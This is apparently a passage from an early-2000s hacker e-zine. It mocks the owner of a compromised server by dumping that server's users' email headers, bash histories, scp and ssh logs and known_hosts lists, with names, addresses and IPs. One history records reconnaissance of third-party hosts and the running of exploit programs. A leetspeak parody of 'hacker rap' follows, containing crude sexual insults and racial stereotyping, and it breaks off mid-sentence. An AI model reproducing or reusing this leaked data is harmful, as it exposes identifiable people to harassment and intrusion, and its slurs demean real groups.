announce-admin@bafug.org bright:Reply-To: Bill Fumerola bright:Reply-To: Majordomo@FreeBSD.ORG bright:Reply-To: jgrosch@mooseriver.com bright:To: "Alfred Perlstein" bright:To: "Nick Stee." bright:To: bright:To: Alfred Perlstein bright:To: Bill Fumerola bright:To: Jonathan Lemon Alfred Perlstein bright:To: Josef Grosch bright:To: Nick S. 
bright:To: Tor.Egge@fast.no bright:To: alfred@productionbsd.com bright:To: alfred@wintelcom.net bright:To: alfred@wintelcom.net (Alfred Perlstein) bright:To: announce@bafug.org bright:To: bright@sneakerz.org cr:Delivered-To: cr@sneakerz.org cr:Delivered-To: dial.pipex.com-moduspublicity@dial.pipex.com cr:Delivered-To: mailing list distinctiverecords@listbot.com cr:Disposition-Notification-To: "RetrO" cr:Reply-To: cr:Reply-To: cr:Reply-To: confirm-sub-U-EmGb9P23-UBpOrf15CIYImMZ8@yahoogroups.com cr:Reply-To: confirm-sub-UBu_9nyHo3zeNMDbohWPyl-AC60@yahoogroups.com cr:Reply-To: freestyle@breakbeat.com cr:Reply-To: gay@breakbeat.com cr:Reply-To: root@sneakerz.org cr:To: "'cr@sneakerz.org'" cr:To: "CafePress.com Member" cr:To: "Zarul" , cr:To: "cr" cr:To: cr:To: cr:To: cr:To: cr:To: List Member cr:To: List Owner cr:To: ListBot Member cr:To: Rob Davis ; Rob Hives ; Rob Mac ; Rob Wood ; Toby Martin (E-mail) ; = cr:To: Scott Douglas cr:To: Trevor Wyatt ; Trevor Nelson ; trax ; Tracie storey ; tee bone ; = cr:To: cr@sneakerz.org cr:To: cr@sneakerz.org cr:To: jody.melbourne@itacsecurity.com cr:To: pm@sneakerz.org cr:To: r0n/ Patch / Buddha Man / PLS cr:To: rpm@airmail.net cr:To: undisclosed-recipients:; cr:To: www.inbox.net@airmail.net cr:X-Envelope-To: moduspublicity@dial.pipex.com desl:Delivered-To: desl@sneakerz.org desl:To: Dan Lennon desl:To: desl@sneakerz.org g:Delivered-To: g@sneakerz.org g:Reply-To: "eBay Marketing" g:Reply-To: "eBay" g:Reply-To: Sales@MDaemon.com g:Reply-To: eBay's Scoot Pursuit g:Reply-To: update@update.deerfield.com g:To: g:To: "Glen Messenger (E-mail)" g:To: "Morrison, Garth" , g:To: g@sneakerz.org g:To: valued_customer@deerfield.com g:X-MDaemon-Deliver-To: g@sneakerz.org james:>Delivered-To: josh@strangled.net james:>To: Joshua Anderson james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Delivered-To: 
james:Delivered-To: james@sneakerz.org james:Delivered-To: james@strobe.org james:Errors-To: online1@wellsfargo.m0.net knowfx:>To: ms Essive knowfx:Delivered-To: dskz-outgoing@informationwave.net knowfx:Delivered-To: dskz@informationwave.net knowfx:Delivered-To: knowfx@sneakerz.org knowfx:Delivered-To: mailing list isn@securityfocus.com knowfx:Delivered-To: mailing list staff@staff.neethosting.com knowfx:Delivered-To: moderator for isn@securityfocus.com knowfx:Errors-To: admins-errors@java.blackened.com knowfx:In-Reply-To: <2004@ravine.binary.net> from "redmare" at Mar 23, 2001 01:02:39 PM knowfx:In-Reply-To: <2033@java.blackened.com>; from rockwood@concentric.net knowfx:In-Reply-To: <2087913@java.blackened.com>; from rockwood@concentric.net knowfx:In-Reply-To: <200@java.blackened.com> "from Jill Luster knowfx:In-Reply-To: from Scott knowfx:Reply-To: dskz@informationwave.net soupnazi:Reply-To: "Anissa" soupnazi:Reply-To: "Nuno Fernandes" soupnazi:Reply-To: soupnazi:Reply-To: soupnazi:Reply-To: Nightlife-feedback-25@lb.bcentral.com soupnazi:Reply-To: jeff@altaassociates.com soupnazi:Reply-To: orders@crutchfield.com suid:Delivered-To: BUGTRAQ@securityfocus.com suid:Delivered-To: bugtraq@lists.securityfocus.com suid:Delivered-To: bugtraq@securityfocus.com suid:Delivered-To: suid@sneakerz.org suid:In-Reply-To: suid:Reply-To: root@sneakerz.org suid:Reply-To: suid@SNEAKERZ.ORG suid:To: suid:To: (Recipient list suppressed) suid:To: suid:To: BUGTRAQ@SECURITYFOCUS.COM suid:To: Kris Hunt suid:To: Suid suid:To: suid@SNEAKERZ.ORG suid:To: suid@sneakerz.org suid:X-To: h@CKZ.ORG yowie:Delivered-To: yowie@sneakerz.org yowie:To: Yowie haha, ok check this out oh by the way, I HAVE NEVER BEEN OWNED, AND ALL YOU FUCKERS WHO SAY + YOU OWN ME, YOU DONT OWN SHIT YOU ARE JUST A BUNCH OF COWARDS AND + SCRIPT KIDDIES WHO DONT KNOW JACK SHIT ABOUT ANYTHING. # cd /root # cat .bash_history|less ls more doimport cd src ls make pwd ls -la cd .. 
lso ls sh doimport top top w ps -aux | grep zmagic ps -auwwx | grep zmagic w netstat 1 top w ps -aux | grep zmagic watch -W p7 w top top w ps -aux | grep irc kill -9 9989 ps -aux | grep zmagic w w top top w top w ls top ls ls -la top cd /home/users/zmagic/ ls ls- la ls -la top top last zmagic top ls top cd /home/users/par ls ls -al cd .. cd /home/users/rat ls -al head haha less -R IrcLog cd /home/staff/ps ls -al less .bash_history ps -aux | grep soupnazi watch -W p9 cd /usr/src ls cd /usr/src ls ls -la cd /shit/FreeBSD4/ ls more doimport cd /shit/FreeBSD4/ ls cd cvs/ ls ls -la cd src ls ls -la cd /shit/FreeBSD4/ ls cd svc cd cvs ls cd src/ ls ls -la make buildworld ls ls cvs cvs import cd /usr/src cvs import cvs update ls pwd ls ls-la ls -l cd sys ls ls -l date cd .. ls pwd cd sys ls locate newvers.sh cd /usr/src/sys/conf/ ls df cu -l cuaa0 cd /eyc cd /etc ls cd namedb/ ls cd cd /usr/ports/ ls cd net/ whereis named whereis bind ls cd .. ls cd sysutils/ ls cd .. ls whereis bind whereis bind8 cd net/ ls cd bind8/ make install all cd /etc ls cd namedb/ ls ci named.conf vi named.conf who w write josh who vvcc c who w ps -ax cd /etc ls who w vi named.conf vi named.conf vi named.conf ls sh make-localhost ls vi localhost.rev ls rm localhost.rev ls vi named.conf vi db.127.0.0 vi db.127.0.0 ls pwd w ls vi named.conf vi db.207.154.226 ls vi db.sneakerz ls who cd /etc/namedb/ ls cd /var/log ls tail messages vi /etc/rc.conf ifconfig -a grep named /etc/defaults/rc.conf vi /etc/rc.conf ls vi /etc/rc.conf ls cd ls cd /home/dave l;s cd /home ls cd /home/dave l;s cd /home ls cd staff/ ls cd ps ls cd .. cd josh/ ls cd .. 
cd dave ls ls -al cd vi /etc/group ls ndc start whereis ndc tail messages ssh -p220 dave@t1.google.com who cd /usr/ports/ ls cd irc ls cd epic4/ ls make install all ls cd cd /usr/ports/ ls cd irc ls who write root ssh -p220 dave@t1.google.com who telnet 0 21 who ps -ax ssh -p220 dave@t1.google.com epic w su - dave write root w vi /etc/inetd.conf cd su - dave killall -HUP inetd su - dave write root write root su - dave cd /usr/ports/www/ ls cd w3m su - monk su - dave cd /home/staff/ ls -l josh/ ls -l ps/ cd su - dave write ps w cd /home/nm cd /home/ncvs/ ls screen vi setuid.today grep rc.local /etc/* vi /etc/rc.local vi /etc/virtualip sh /etc/rc.local ifconfig -a w w df w w dmesg grep smurf /usr/ports/INDEX cd /usr/ports/security/smurflog/ ls make w dmesg top w ifconfig -a tcpdump find /sbin -perm 4000 find /sbin -perm -1000 ps ax ls -l /sbin df less /var/log/setuid.today grep root /var/log/messages top last jimjones w hostname we e w ps -ax cd /home ls cd staff/ ls cd /usr/local/apache/htdocs/ ls more index.html cd /shit/FreeBSD4/ cvsup -L 2 supfile export HOME=/root ls pwd ls -la more /home/staff/ps/.bash_history top more /home/staff/ps/.bash_history ht mutt thats history in the making Looking at your history files makes me want to read SECURING LINUX + IN 21 DAYS, all over again. Caviar dreams pm, caviar dreams. yah hehe did you see me ssh into google.com? wish you had my password huh? 
:) :D ok i got so much stuff for your wonderful tv show # cd / # cat sshstuff1 | less home/users/billf/.bash_history:ls -l .ssh/authorized_keys home/users/billf/.bash_history:ls .ssh/ home/users/billf/.bash_history:mkdir .ssh home/users/billf/.bash_history:vi .ssh/authorized_keys home/users/billf/.bash_history:vi .ssh/authorized_keys home/users/cr/.bash_history:ssh -lcr el8.net home/users/cr/.bash_history:ssh -lcr meth.lab.org home/users/cr/.bash_history:ssh -lrogue puck.nether.net home/users/cr/.bash_history:ssh -ls33r freenet.nether.net home/users/james/.bash_history:ssh 209.63.220.137 home/users/james/.bash_history:ssh 64.38.245.135 home/users/james/.bash_history:ssh 64.38.247.160 home/users/james/.bash_history:ssh 64.38.247.180 home/users/james/.bash_history:ssh afraid.org home/users/james/.bash_history:ssh cb2.kglimited.net home/users/james/.bash_history:ssh ns1.kglimited.net home/users/mux/.bash_history:mkdir .ssh home/users/mux/.bash_history:scp mux.dyn.dhs.org:.ssh/id_dsa.pub .ssh/authorized_keys2 home/users/scott/.bash_history:ssh -l skl pav-l1.hotmail.com home/users/scott/.bash_history:ssh mu.org home/users/suid/.bash_history:cd .ssh home/users/suid/.bash_history:ssh -l suid CPE-61-9-178-2.vic.bigpond.net.au home/users/walt/.bash_history:ssh 216.32.183.201 home/users/walt/.bash_history:ssh -p 216.32.183.201 home/users/walt/.bash_history:ssh 216.32.183.201 home/users/walt/.bash_history:ssh 216.32.183.201 -P home/users/walt/.bash_history:ssh aaronsca@mu.org home/users/walt/.bash_history:ssh pav-l1.hotmail.com # cat scpstuff1 | less home/users/mux/.bash_history:scp mux.dyn.dhs.org:.ssh/id_dsa.pub .ssh/authorized_keys2 home/users/oobe/.bash_history:scp -v bzImage 64.208.38.1:. home/users/oobe/.bash_history:scp -v bzImage root@64.208.38.2:. home/users/oobe/.bash_history:scp bzImage root@64.208.38.2:. home/users/oobe/.bash_history:scp bzimage root@64.208.38.2:. 
home/users/scott/.bash_history:scp evanw16.Imagine.IL.US.NeverNET.Net 62.252.9.43:~/ home/users/yowie/.bash_history:scp xf0rce.zip yowie@61.12.36,180:. home/users/yowie/.bash_history:scp xf0rce.zip yowie@61.12.36.180:. Ok pm, I am so so so so so sorry to interrupt you, but can + you please show me cr's history file? that, i can do UNIX BOWLERS! # cd /home/users/cr # less .bash_history ls -l /dev/null ls -la .bash_history rm .bash_history grep HIST .* set vi .profile screen -r mutt screen -r screen -r telnet mail.itacsecurity.com 110 telnet mail.itacsecurity.com 110 telnet mail.itacsecurity.com 110 mail telnet mail.itacsecurity.com 25 screen -r screen -r host -l workcover.com telnet www.sb.workcover.com 80 telnet www.sb.workcover.com 443 telnet www.sb.workcover.com 21 ftp www.sb.workcover.com more passwd rm passwd telnet www.sb.workcover.com 23 telnet www.sb.workcover.com 22 telnet www.sb.workcover.com 25 telnet www.sb.workcover.com 110 telnet www.sb.workcover.com 513 telnet www.sb.workcover.com 79 telnet www.sb.workcover.com 111 host -l workcover.com telnet 150.101.73.34 v21 telnet 150.101.73.34 21 telnet 150.101.73.34 22 telnet 150.101.73.34 telnet 150.101.73.35 80 telnet 80 telnet 192.231.203.33 80 telnet 192.231.203.33 21 telnet 192.231.203.33 111 telnet 192.231.203.33 110 telnet 192.231.203.33 22 telnet 192.231.203.33 25 telnet 192.231.203.33 79 whisker.pl host -l workcover.com.au host -l workcover.com telnet www.workcover.com 80 telnet www.internal.workcover.com 80 telnet internal.workcover.com 80 telnet www.school.workcover.com 80 telnet www.users.on.net 110 telnet www.users.on.net 21 nmap 150.101.73.34 exit ls -l screen -r slookup right.behind.you nslookup right.behind.you screen -r script work ls -l work gzip work chmod a-r work.gz ls -l screen -r nslookup www.e-safety.sa.gov.au host -l e-safety.sa.gov.au host -l sa.gov.au mutt screen -r screen -r exit mutt exit host -l workcover.com host -l internal.workcover.com z0ne nslookup 150.101.73.100 nslookup 
150.101.73.101 nslookup 150.101.73.1 nslookup 150.101.73.2 nslookup 150.101.73.34 nslookup 150.101.73.35 nslookup 150.101.72.1 nslookup 150.101.72.2 screen -r exit mutt screen -r mutt screen -r bx cr_ irc.idle.net screen -r more wu261.c more wu261.c more wu2.6.1.c more rh7linuxconf.pl.txt mutt screen -r screen -r mutt screen 0r screen -r mutt exit mutt screen -r screen -r slookup itac1.lnk.asionline.net nslookup itac1.lnk.asiaonline.net nslookup itac1.lnk.cbr.asiaonline.net host -l lnk.asiaonline.net host -l lnk.cbr.asiaonline.net host -l cbr.asiaonline.net nslookup itac1.sbr.asiaonline.net nslookup itac1.cbr.asiaonline.net screen -r mutt screen -r screen -r mutt exit ls exit ls cp admtac0s-bin.gz www lynx sneakerz.org/~cr ls ls -la screen -r screen -r screen -r *.c ls *.c screen -r more wu2.6.1.c screen -r grep site wu*.c screen -r more wu261.c screen -r more wu261.c screen -r screen -r ls screen -r ls more linuxconf.c ssh -ls33r freenet.nether.net telnet freenet.nether.net telnet freenet.nether.net 21 telnet puck.nether.net 22 ssh -lrogue puck.nether.net screen -r ar zxvf linuxconf-xpl.tar.gz tar zxvf linuxconf-xpl.tar.gz more linuxconf-xpl. 
more linuxconf-xpl.c screen -r s ls screen -r screen -r ssh -lcr el8.net screen -r exit screen -r exit screen -r exit set export TERM=vt100 screen -r cd www ;s ls mail guy@breakbeat.com screen -r telnet 150.101.73.100 80 telnet 150.101.73.100 80 telnet 150.101.73.100 80 screen -r ls ls *.c screen -r screen -r ls ls *.c screen -r mutt exit mutt screen -r export IRCNAME="flip the track, bring the oldschool back" bx cr irc.mcs.net screen -S ef bx cr irc.mcs.net telnet 150.101.73.100 80 telnet 150.101.73.100 80 screen -r screen -r exit screen -r lynx www.apache.org lynx www.slashdot.org lynx www.slashdot.org lynx www.slashdot.org lynx www.slashdot.org screen -r exit screen -r mutt tar zxvf work.gz tar zxvf route_finder.tar.gz cd rf ls -l more route_finder more word_route_finder screen -r ls more route_finder ls more word_route_finder ls cd .. ls exit mutt screen -r ls cd rf ls more words rm words ls ls -la cd .. ls *.tar.gz screen -r exit mutt screen -r w screen -r ls -la more linuxconf-xpl.c screen -r ls exit screen -r mutt screen -r telnet 150.101.73.100 80 screen -r exit mutt screen -r host -l workcover.com dig @workcover.com any any telnet 150.101.73.100 80 telnet 150.101.73.100 53 sscreen -r traceroute traceroute 150.101.73.34 screen -r bx cr irc.oz.org screen -r nslookup 203.53.186.41 nslookup 203.53.186.1 mutt screen -r telnet www.afp.gov.au 80 head 3.c screen -r mail buo@ussrback.com date screen -r ls cat 3.c |mail buo@ussrback.com screen -r mutt screen -r clear cd .hi cd rf ls more route_finder ls more word_route_finder q ls screen -r ls more 1.c more 1.c ls more 3.c ls ls *.c more fbsd2.c more fbsd.c more fbsd.c gcc fbsd.c -o fbsd ./fbsd ./fbsd 0 screen -r more fbsd.c qtail fbsd.c tail fbsd.c screen -r ssh -lcr meth.lab.org screen -r ssh -lcr el8.net screen -r nmap ls more crpron cd .. 
screen -r telnet www.horseland.com 80 telnet www.horseland.com 443 screen -r screen -r mutt screen -r screen -r vi cat pro |cut -f2 -d" " cat pro |cut -f2 -d" ">> pro2 more pro2 rm pro* screen -r screen -r bx cr irc.dal.net bx cr irc.austnet.org bx cr irc.undernet.org screen -r exit screen -r nc find / -name nc -print 2>/dev/null screen -r screen -r mutt screen -d -r box to even get questioned by the feds in .au though mutt exit hahahaha pm, I can't stop but ask, why was cr doing nslookup on + right.behind.you? LOL im laughing my ass off it also looks like he tried to own my system with that fbsd.c shit i should kick all these users off and add more elite ones, more + w00w00 people. # cd / # cat bitchxstuff1 | less -rw-r----- 1 cr users 832281 home/users/cr/.BitchX/BitchX.away -rwx------ 1 g users 29427 home/users/g/.BitchX/BitchX.away* -rw-r----- 1 mux users 38061 home/users/mux/.BitchX/BitchX.away -rw-r----- 1 suid users 270331 home/users/suid/.BitchX/BitchX.away -rw------- 1 udp users 5229 home/users/udp/.BitchX/BitchX.away -rw-r----- 1 zmagic users 4312 home/users/zmagic/.BitchX/BitchX.away cr's away file is huge :D i will show it to you later during our private session i would also like to reiterate that I HAVE NEVER BEEN OWNED. ONE DAY + THE POWER SUPPLY BLEW UP BECAUSE A TERMITE ATE THE WOOD CASING. MY + SYSTEM IS NOT DOWN BECAUSE IT WAS HACKED, IT HAS NEVER BEEN HACKED, AND + NONE OF YOU CAN HACK IT. IF ANYONE CAN HACK IT, SHIT, I WILL GIVE THEM + A BLOWJOB COURTESY OF SNEAKERZ (TM) NETWORKS. 
r0b1n, people on my system ssh (not telnet) to some of the most + incredible and secure systems in the universe, take a look see # cd / # cat sshstuff2 | less home/staff/monk/.ssh/known_hosts:funksion.org home/staff/monk/.ssh/known_hosts:9mm.com home/users/awnex/.ssh/known_hosts:shadowside.org home/users/billf/.ssh/known_hosts:elvis.mu.org home/users/billf/.ssh/known_hosts:hate.chc-chimes.com home/users/bright/.ssh/known_hosts:hardcode.wintelcom.net home/users/cr/.ssh/known_hosts:ns6.siteleader.net home/users/cr/.ssh/known_hosts:meth.lab.org home/users/cr/.ssh/known_hosts:61.12.32.120 home/users/cr/.ssh/known_hosts:titus.visual.com home/users/cr/.ssh/known_hosts:www.breakbeat.com home/users/cr/.ssh/known_hosts:breakbeat.com home/users/cr/.ssh/known_hosts:wstrn.com home/users/cr/.ssh/known_hosts:puck.nether.net home/users/cr/.ssh/known_hosts:el8.net home/users/g/.ssh/known_hosts:198.142.183.24 home/users/g/.ssh/known_hosts:yowie.kg home/users/g/.ssh/known_hosts:198.142.196.172 home/users/g/.ssh/known_hosts:203.28.37.130 home/users/g/.ssh/known_hosts:breakbeat.web.us.uu.net home/users/james/.ssh/known_hosts:atlantis.tranquility.net home/users/james/.ssh/known_hosts:0 home/users/james/.ssh/known_hosts:shell1.tranquility.net home/users/james/.ssh/known_hosts:blacklight.strobe.org home/users/james/.ssh/known_hosts:bl.strobe.org home/users/james/.ssh/known_hosts:206.152.119.225 home/users/james/.ssh/known_hosts:tranq3.tranquility.net home/users/james/.ssh/known_hosts:afraid.org home/users/james/.ssh/known_hosts:stats.paycounter.com home/users/james/.ssh/known_hosts:63.195.184.43 home/users/james/.ssh/known_hosts:63.195.184.247 home/users/james/.ssh/known_hosts:63.195.184.126 home/users/james/.ssh/known_hosts:ns1.wintelcom.net home/users/james/.ssh/known_hosts:tranq1.tranquility.net home/users/james/.ssh/known_hosts:jobe.strobe.org home/users/james/.ssh/known_hosts:strobe.org home/users/james/.ssh/known_hosts:64.166.225.94 home/users/james/.ssh/known_hosts:mir.base16.org 
home/users/james/.ssh/known_hosts:home.afraid.org home/users/james/.ssh/known_hosts:cb1.wintelcom.net home/users/james/.ssh/known_hosts:12.153.162.137 home/users/james/.ssh/known_hosts:64.38.247.160 home/users/james/.ssh/known_hosts:64.38.247.180 home/users/james/.ssh/known_hosts:cb2.kglimited.net home/users/james/.ssh/known_hosts2:afraid.org home/users/james/.ssh/known_hosts2:c191933-b.clmba1.mo.home.com home/users/james/.ssh/known_hosts2:home.strobe.org home/users/knowfx/.ssh/known_hosts:132.170.44.44 home/users/james/.ssh/known_hosts2:home.strobe.org home/users/knowfx/.ssh/known_hosts:132.170.44.44 home/users/knowfx/.ssh/known_hosts:neethosting.com home/users/mux/.ssh/known_hosts2:mux.dyn.dhs.org home/users/oobe/.ssh/known_hosts:64.208.38.2 home/users/par/.ssh/known_hosts:65.5.27.115 home/users/par/.ssh/known_hosts:65.5.27.252 home/users/rat/.ssh/known_hosts:port44.dorms44.ucf.edu home/users/reject/.ssh/known_hosts2:zap.netfrag.com home/users/scott/.ssh/known_hosts:mu.org home/users/scott/.ssh/known_hosts:62.252.9.43 home/users/scott/.ssh/known_hosts:pav-l1.hotmail.com home/users/soupnazi/.ssh/known_hosts:216.240.185.234 home/users/soupnazi/.ssh/known_hosts:209.191.170.8 home/users/soupnazi/.ssh/known_hosts:noodle-soup.fortunecity.com home/users/soupnazi/.ssh/known_hosts:postal1.fortunecity.com home/users/soupnazi/.ssh/known_hosts:lower.org home/users/soupnazi/.ssh/known_hosts:132.170.44.44 home/users/soupnazi/.ssh/known_hosts:jimjones.niggacrazy.com home/users/soupnazi/.ssh/known_hosts:legion2000.net home/users/soupnazi/.ssh/known_hosts:shell.openhack.com home/users/soupnazi/.ssh/known_hosts:ws1.nhl.com home/users/soupnazi/.ssh/known_hosts:www.djalterego.com home/users/soupnazi/.ssh/known_hosts:ws4temp.nhl.com home/users/soupnazi/.ssh/known_hosts2:209.191.170.220 home/users/spider/.ssh/known_hosts:64.172.12.3 home/users/suid/.ssh/known_hosts:kernel.net home/users/suid/.ssh/known_hosts:jawa.chilli.net.au home/users/suid/.ssh/known_hosts:yowie.kg 
home/users/suid/.ssh/known_hosts:61.12.32.120 home/users/suid/.ssh/known_hosts:ninjastrike.com home/users/suid/.ssh/known_hosts:cpe-61-9-146-112.vic.bigpond.net.au home/users/suid/.ssh/known_hosts:61.9.146.112 home/users/udp/.ssh/known_hosts:port44.dorms44.ucf.edu home/users/udp/.ssh/known_hosts:coalesce.underworld.net home/users/udp/.ssh/known_hosts:boredom.org home/users/udp/.ssh/known_hosts:voodooland.net home/users/udp/.ssh/known_hosts:leviathan.org home/users/udp/.ssh/known_hosts:fire.efnet.org home/users/walt/.ssh/known_hosts:pav-l1.hotmail.com home/users/walt/.ssh/known_hosts:mu.org home/users/yowie/.ssh/known_hosts:61.12.36.180 home/users/zmagic/.ssh/known_hosts:tdz.dhs.org home/users/zmagic/.ssh/known_hosts:zsh.interniq.org home/users/zmagic/.ssh/known_hosts:132.170.44.12 home/users/zmagic/.ssh/known_hosts:fire.efnet.org home/users/zmagic/.ssh/known_hosts:216.30.134.185 home/users/zmagic/.ssh/known_hosts:users.interniq.org home/users/zmagic/.ssh/known_hosts:syn.ackers.net home/users/zmagic/.ssh/known_hosts:stardust.europeonline.net home/users/zmagic/.ssh/known_hosts:phear.org home/users/zmagic/.ssh/known_hosts2:rain.ktwo.ca home/users/zmagic/.ssh/known_hosts2:frost.ktwo.ca hehe *** r0b1nleech is now known as WOW *** *** WOW is now known as r0b1nleech *** hahahahaha Wow man, hotmail, efnet, ktwo! You are probably the best guest I have ever owned, oops, I mean + interviewed for lyfestylez of the owned and lamest. thanks r0biepoos PART THREE: remind them about the never been owned stuff Caviar dreams. We have just had a guest who personifies the + hacker life style. He hacks, He codes, He works for google, He's worked + for microsoft, He's been around. And one thing I would like to point out + about our guest, is that he has never been owned, and never will be. yup, never been owned See, owning someone this incredibly lame takes an enourmous + amount of skill, which of course, no one has. 
In a fantasy world, where hacking is life, pm, one of the + greatest lamers around, lives the dream, lives the big life, drives + a bmw, and hangs out in #!w00w00. What more can you ask for? I leave + you with this final note: pm, has NEVER, EVER, EVER, EVER, I repeat NEVER EVER EVER + EVER EVER NEVER EVER EVER EVER EVER, been owned. good night, suck my fat dick, and wipe that dangling shit + off the tip of your dick stick. yah bye, btw NEVER BEEN OWNED hah, cya .~e~----------------------------------------------------------~e~. ; *05* muz1k in the undergr0und -- uncle m4v1s ; `----------------------------------------------------------------' muz1k 1n the undergr0und by uncle m4v1s --------------- the p4zt few ye4rz have s33n a surge 0f muz1kal tal3ntz 1n the d1g1t4l undergr0und.... fr0m the 4sh3z 0f g4ngst4h r4p c0mez a new g3nr3 0f muz1k 2 rev0lut10n1z3 the w0rld 4ever... e-thug d1g1t4l r4p. uncle m4v1s h4z k0mp1l3d a l1zt 0f 2dayz *h0ttezt* art1ztz 1n th3 haqr subkultur3 & s0me rev1ewz... the ph4t be4tz and krayzEeE b4ssl1nez u he4r 1n kutt1ng edg3 e-thug d1g1t4l r4p w3r3 pi0neered by n0ne 0ther than the m4ster bl4zt3r h1mself, h4g1z' sh0ckwave r1d3r. sp0rt1ng h1z d33p-runn1n m1ztruzt 0f auth0rity 4nd h1z 1ntim8 kn0wledge 0f g4ng w4rf4re, the acqu1z1ti0n 0f 1llegal drugz & weap0nz, & the cl0zely gu4rd3d s3kr3t 0f h0w 2 h1t th3 g-sp0t in 0ver 38 unique w4yz, he sh0qd th3 w0rld by pl4c1ng sh4dy & kl3v3rly w0rd3d c4tch phr4sez 1n h1z IRCNAME variable. h3 br0ught h0n0r 2 h1z ment0rz eazy-e and chuck-d by pr0v1d1ng 1nexper13nz3d wh1te k1dz on 1rc w1th 4 d4nger0us and 4st0und1ng 1ns1ght 1n-2 wh4t 1t m34nz 2 b3 black, r3f3r3nc1ng such 1rc n4m3z az "1t t4k3z 4 n4t10n 0f m1ll1i0nz 2 h0ld my saq" [see publ1k 3n3my, 54]. 0ften th3z3 0bskure l1n3z w0uld s3nd phell0w f@ wh1t3 h4qrz dr3ss3d in BDUz & k0mbat b00tz runn1ng 2 g00gl3. wh3n mb'z st4tuz az an undergr0und br0th4 wuz f1nal1zed [see "blaq 1z merely 4 st4t3 0f m1nd", 82] 0therz were s00n 2 f0ll0w. 
so1o 0f ph4med t33n haqr/he4rtThr0bz c0deZerO k0mb1n3d h1z sk1ll3d kn0wledg3 0f purch4z1ng n1qlb4gz & begg1ng 4 k04dz wh3n h3 c0ined th3 3ver s0-p0pular k4tch phr4ze "y() d4wg, 5up." & the r3zt u kn0w 1z h1zt0ry. u k4n r34d m0re inph0 ab0ut s1 in m1ke sch1ffman'z upk0m1ng b00k ent1tl3d "br0, 1m a h4qr n0t a k0d3r" (ISBN 835827577158). th0 d1g1t4l thugz in tha 2K+2 may !have (th4tz a l0g1k4l neg4t10n, or "n0t have" 4 u untekn1k4l read3rz) even h34rd 0f nw4, they st1ll r3pruhz3nt the s4me c0ld he4rt-0f- d4rkn3zz / str8 phr0m s0uth c3ntr4l m3nt4l1ty th@ fu3l3d f34tz 0f m4str haqry 1n the m1d 90z, such 4z the t4ktik4l l0gic-b0mb 1mpl4nt3d 1n-2 yah00. s0me k0mpl41n th@ the 1rc thugz 0f the new m1ll3nn1um h4ve l0st ph0kuz 0f kreat1ng hypn0t1z1ng phreakyPhr3$h phl0w & r 2 kaught up 1n s3ll1ng drugz 0n 3fn3t 0r putt1ng up p1cz 0f the1r n3w r1mz 0n th31r h3rt.0rg h0mepagez, but u k4n dec1de 4 y0urself. ytcracker [the 0r1g1n4l d1g1t4l g4ng3r] --------------------------------------- th3 f1rzt 2 expl1c1tly use the t3rm '0r1g1n4l d1g1t4l g4ngst4h' when h3 gr4ff3d h1z mug 0n th3 dcaa website 11/23/99. the e-g1f p1ktur3, l00s3ly b4s3d 0n 4 ph0t0 t4k3n dur1ng th3 #sesame str33t 1rc sh0wd0wn sh0wz a rugg1sh thugg1sh y0ung yT, dr3zz3d 4 b1t l1ke kR4zy t3d k4cz1nszky [s33 http://www.paybackprod.com/hackedsites/dcaa] w1th wh4t app34rz 2 be a huge g0ld ch41n k00l3ct3d phr0m 3 m0nthz 0f p4wn1ng m0sth8d's e-l00t. th0 2 many @ ph1rst gl4nc3 h3 appe4rz 2 be we4r1ng a pe4c3 symb0l, rum0rz circul8 th@ yT l00ted th1z r3l1c 4ft3r gunn1ng d0wn a f4m1ly 0f as14n sh0p0wn3rz 1n k0ld bl00d in the inf4m0uz LA ri0tz. st1ll 0therz s4y 1t 1z n0t a p34c3 symb0l @-all, but r34lly a h00d 0rnament st0len phr0m shuge kn1ghtz benz!! whut3v3r the true st0ry 1z, ytcraqr h4z k0nt1nu3d 2 1nsp1r3 y0ung e-thugz w0rldw1d3. 1t 1z rep0rt3d th@ ytkrakr mp3z r h3r4d 4z f4r away az k4r4ch1, wh3r3 h1z pr0tegez gf0rce p4k1st4n h4v3 sh0qd l0c4l m0squez by bl4stn d1g1t4l h1ph0p 0uts1d3. 
1n p4k1st4n, wh3r3 l1n0leum phl00rz r unava1lable, 0ne gf0rce member, german_gu c4us3d qu1te a st1r by bec0ming the ph1rzt musl1m bb0y 2 buzt 0ut 1n2 a w1ndm1ll 0n hiz pr4y3r m4t. unphortun4tely, m0zt 0f yTcr4ck3rz w0rk 1z unr3l34z3d, & un4v4il4ble 4 d0wnl0ad. but 2 m4ny, th1z d0eznt m4tt3r, 4 th0ze wh0 v1e3 h1m 4z an 1k0n 0f s1n & rebell10n. yt iz str8 up p10n33r. r00tabega --------- 4z they r kall3d 0n their page, "r00tabega: 1ndepend3nt hyde p4rk h1p h0p." damn h0w d0 i descr1be th1z except az 'pr0l1f1k.' bansh33 p0pz 0ut new rele4s3z ph4ster th4n 0l d1rty bast4rd k4n get b1tchez pregn4nt. u k4n ch3ck 0ut th3z3 b34tz @ http://www.r00tabega.org/rap th31r l8zt release 1z kalled 'the c0c00n' & m4n 1tz exxxxxxxxxXtra phantast1kly phre$$$$$$$$$h. r00tabegz phearl3zz leader 1z r1shi bh4t, u m1ght r3m3mb3r h1m az th3 ugly l1tl krumbsn4tchr phr0m th3 ph1lm 'th3 1nd14n 1n the cupb04rd.' u kan ch3ck h1z interv1ew @ http://www.rediff.com/chat/trans/0216rish.htm 4z we k4n c y0ung r1sh1 1z a k0l0rful ch4r4ct3r; he st4rt3d haqng PRIMOS @ the age 0f 6, & wuz 1nsp1r3d 2 freestyle apht3r 0wn1ng h1z 1zt DMS100. wh4t d0ez r1sh1 d0 4 fun? w3ll the maztr h1mself repliez: "Programming, Tennis, Piano, Clarinet, Rapping." r00tabega, wh1ch ink0rp0r8z inkredible muzik4l/haqng t4l3ntz such as the 1ncred1bl3 "busdr1v3r" (hehe he g0t th1z n4m3 k0z he takez u all 2 sk00l!) and bansh33, r seen by m4ny 4z a resp0nse 2 the 1nf4m0uz "ICY HOT STUNTAHZ," an0th3r tr10 0f rap superstarZzzZ wh0 h4v3 b33n kn0wn 2 frequent the 3r1z PHR33 netw0rkz but d0 n0t h4ck. 2 bansh33 th1z 1z 4ll th3 d1ff3r3nc3. wh3n 4sk3d ab0ut h1z op1n10n 0f the 1cy h0t stunt4hz h3 pau4z3d 4 a m0ment, t0ld me 2 "h0ld up d4wg" and st4rt3d t4pp1ng h1z f00t (he 0nly wearz LuGZ), 4nd r4pp3d @ 